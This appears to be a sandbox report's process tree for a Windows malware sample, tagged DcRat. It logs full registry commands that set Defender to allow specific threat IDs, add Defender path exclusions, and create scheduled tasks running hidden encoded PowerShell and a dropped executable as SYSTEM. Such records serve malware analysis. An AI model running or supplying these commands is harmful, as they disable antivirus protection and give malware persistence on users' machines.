                                                                                                                                                                                                                                                                                                            powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                              PID:5132
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                  PID:804
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                      PID:1732
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                      PID:5800
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                        PID:4628
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                          PID:3652
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                            PID:5692
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                              PID:6056
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                PID:6064
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                  PID:4892
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                    PID:484
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                      PID:4228
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                        PID:3864
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                          PID:4392
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                            PID:5024
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                              PID:5108
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                PID:2540
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                  PID:456
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                    PID:2656
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                      PID:2256
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                        PID:4496
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                          PID:4736
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                            PID:4532
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                              PID:3424
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                PID:3436
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:736
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QMuGxDzxU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QMuGxDzxU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhmfbgEUeceU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhmfbgEUeceU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iTBLcazoBHNRC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iTBLcazoBHNRC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rYNYBiCjmUUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rYNYBiCjmUUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hnkumIqTRwUxQLVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hnkumIqTRwUxQLVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RHdUtmclRPrQNqWD\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RHdUtmclRPrQNqWD\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:1076
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:5932
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:5852
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:1848
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhmfbgEUeceU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:6020
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhmfbgEUeceU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:4980
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:5704
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:2308
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iTBLcazoBHNRC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:5144
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iTBLcazoBHNRC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:5772
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rYNYBiCjmUUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:5448
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rYNYBiCjmUUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:5280
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hnkumIqTRwUxQLVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:488
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hnkumIqTRwUxQLVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:2352
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:4832
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:4780
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\RHdUtmclRPrQNqWD /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:4388
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\RHdUtmclRPrQNqWD /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:1236
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                    schtasks /CREATE /TN "grVdSBQdv" /SC once /ST 08:24:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                    • DcRat
                                                                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                    PID:1448
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                    schtasks /run /I /tn "grVdSBQdv"
                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:5836
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                      schtasks /DELETE /F /TN "grVdSBQdv"
                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:2308
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                        schtasks /CREATE /TN "CHeJVxoJwhzmREGSo" /SC once /ST 15:10:56 /RU "SYSTEM" /TR "\"C:\Windows\Temp\RHdUtmclRPrQNqWD\McgkcspSIzRLCAP\RbFjslR.exe\" sG /site_id 525403 /S" /V1 /F
                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                        • DcRat
                                                                                                                                                                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                        PID:5224
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                        schtasks /run /I /tn "CHeJVxoJwhzmREGSo"
                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:3356
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\cache\MoUSO.exe
                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\cache\MoUSO.exe
                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:5580
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\dahbvur
                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\dahbvur
                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:3164
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\vvhbvur
                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\vvhbvur
                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
